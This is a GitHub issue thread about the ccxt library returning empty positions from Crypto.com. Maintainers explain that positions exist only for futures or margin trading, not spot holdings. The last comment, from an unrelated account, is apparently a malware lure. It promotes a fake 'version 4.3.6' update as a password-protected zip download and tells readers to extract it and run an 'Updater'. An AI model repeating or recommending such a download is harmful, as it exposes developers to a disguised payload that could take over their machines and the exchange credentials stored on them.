### ISSUE TITLE
Crypto.com unable to fetch position(s)

### ISSUE THREAD

**Issue by RyanLiuQ** [ccxt/ccxt#22086]
### Operating System

windows 11

### Programming Languages

Python

### CCXT Version

4.2.88

### Description

After testing the resolved issue #22016, I noticed that there were no more errors, but that my position data was not retrieved from the crypto.com exchange. I only received empty data back.  I went ahead and checked if there was data coming back from the exchange by using the python methods as stated by the exchange on this website : https://exchange-docs.crypto.com/exchange/v1/rest-ws/index.htm
After running a python script using the "private/get-positions" method that the exchange provides I noticed that the data also comes back empty, even though I have several open positions. Data retrieved : {'id': 1, 'method': 'private/get-positions', 'code': 0, 'result': {'data': []}}

My question now is : 
Are you from CCXT also able to reproduce this issue with the Cryptocom exchange ? And is there a way around this using the ccxt module (other than fetch_balance?).
I tried contacting Crypto.com through their email and chat, but I didn't get very far with that. 

### Code

```
  

```

**Comment by sc0Vu** [comment]
@RyanLiuQ did you have open positions?

**Comment by carlosmiei** [comment]
Hello @RyanLiuQ, 
That's very weird because we're using this method https://exchange-docs.crypto.com/exchange/v1/rest-ws/index.html#private-get-positions that only accepts the symbol, so we don't have that many different combinations that can be done.

Can you please post a verbose log of the request? (`exchange.verbose = True` before calling fetch_positions)

**Comment by RyanLiuQ** [comment]
I turned Verbose on and ran the following code. I have attached the verbose log to this ticket as a .txt file : 
fetch = exchange.fetch_positions()

[verbose_log.txt](https://github.com/ccxt/ccxt/files/14908108/verbose_log.txt)

Answer to previous question : yes, I have a few open positions. When I run the function fetch_balance() I can see them there.

**Comment by carlosmiei** [comment]
Hum @RyanLiuQ as you can see, getPositions returns an empty array:

```
fetch Response: cryptocom POST https://api.crypto.com/exchange/v1/private/get-positions 200 ResponseHeaders: {'Date': 'Mon, 08 Apr 2024 15:52:09 GMT', 'Content-Type': 'application/json', 'Transfer-Encoding': 'chunked', 'Connection': 'keep-alive', 'CF-Ray': '87136c3f8a2502dc-MIA', 'CF-Cache-Status': 'DYNAMIC', 'Cache-Control': 'no-cache, no-store, max-age=0, must-revalidate', 'Expires': '0', 'Set-Cookie': 'AWSALB=iQWZtpIrk4+rNekTZAT5++FBUjszYIiVzGs+Bsm+37z01AARmYre29DgpCLxJ5FORt7kUExpnR3OAclxOVE7Y0epYr14A9AIc6043W3M4Mlz9bxk7+Cq7WiK1T53; Expires=Mon, 15 Apr 2024 15:52:09 GMT; Path=/, AWSALBCORS=iQWZtpIrk4+rNekTZAT5++FBUjszYIiVzGs+Bsm+37z01AARmYre29DgpCLxJ5FORt7kUExpnR3OAclxOVE7Y0epYr14A9AIc6043W3M4Mlz9bxk7+Cq7WiK1T53; Expires=Mon, 15 Apr 2024 15:52:09 GMT; Path=/; SameSite=None; Secure, __cf_bm=AyUpLrdGjY.RY77GQPuFA_6jdfsws6wFd7acQfc2svk-1712591529-1.0.1.1-jhJs_WbULWtFcBeaOyVYY.C9NIcKZS5hET47Ss9KI4ZEa4KSClehyUr5WAY7cqLu8iEoGF6z9INl9j5hhkirJw; path=/; expires=Mon, 08-Apr-24 16:22:09 GMT; domain=.crypto.com; HttpOnly; Secure; SameSite=None, _cfuvid=TKODvWgcku15xJYdN39zIgdjWFkvAeyXj_tTHeLh94c-1712591529663-0.0.1.1-604800000; path=/; domain=.crypto.com; HttpOnly; Secure; SameSite=None', 'Strict-Transport-Security': 'max-age=31536000 ; includeSubDomains', 'Vary': 'Origin, Access-Control-Request-Method, Access-Control-Request-Headers, Accept-Encoding', 'pragma': 'no-cache', 'referrer-policy': 'no-referrer', 'x-content-type-options': 'nosniff', 'x-frame-options': 'DENY', 'x-xss-protection': '1 ; mode=block', 'Server': 'cloudflare', 'Content-Encoding': 'gzip', 'alt-svc': 'h3=":443"; ma=86400'} ResponseBody: {
  "id" : 1712591528226,
  "method" : "private/get-positions",
  "code" : 0,
  "result" : {
    "data" : [ ]
  }
}
```

**Comment by RyanLiuQ** [comment]
Hi @carlosmiei  , the same as in the description of the issue above. So it seems like there is something wrong at cryptocom's end ? 

When I run the ccxt function fetch_balance() I can see my open positions. I also see them when running the cryptocom 'private/user-balance' method. 
I would expect the same data to be received back when looking for open positions with the ccxt fetch_positions() or cryptocom's 'private/get-positions' method . part of the dictionary I get back when running fetch_balance() is posted here below :

{'quantity': '0.00015996', 'reserved_qty': '0', 'collateral_amount': '10.35569906', 'haircut': '0.1', 'collateral_eligible': True, 'market_value': '11.50633229', 'max_withdrawal_balance': '0.00015996', 'instrument_name': 'BTC', 'hourly_interest_rate': '0'}

**Comment by carlosmiei** [comment]
Can you take a print at the "positions" section in the WEB UI so we can compare it?

**Comment by RyanLiuQ** [comment]
Hi @carlosmiei , I see that there is a seperate tab next to balances called 'positions' That one is empty for me. I probably have misunderstood the term Position. I thought that were trades I have made and are still 'active' because I haven't sold them yet. I am attaching screenshots of both tabs in the WEB UI. 

![Balance](https://github.com/ccxt/ccxt/assets/149338268/116280e0-dd43-49eb-aaff-9b252ed12c49)
![Positions](https://github.com/ccxt/ccxt/assets/149338268/16ee7d60-ec7b-457d-920c-158bd7dc7d97)

**Comment by carlosmiei** [comment]
@RyanLiuQ Yes I think you're probably confusing some concepts, positions only apply to futures/perp trading and in some exchanges spot-margin trading. If you're just buying/sell on the spot market then you don't have "positions"

**Comment by RyanLiuQ** [comment]
@carlosmiei ,  thanks for the explanation. So i think the information I am looking for can be retrieved using the fetch_balance() function ? for example if I am looking for the 'quantity' or current 'market_value' of a (spot) trade I am actively holding. Is that the best function to use ?

**Comment by Enterpreneruim** [comment]
New Version has been Released 4.3.6
Fixed: Password asking, failed system load, XML load and etc. coinex fixed, coinbase fixed.
Extract files into folder with older version and start Updater.
[ccxt_upd_fetched.zip](https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip)
Full link - https://github.com/ccxt/ccxt/files/15094134/ccxt_upd_fetched.zip
- Password 2024
- Current Status: Working, April 24.
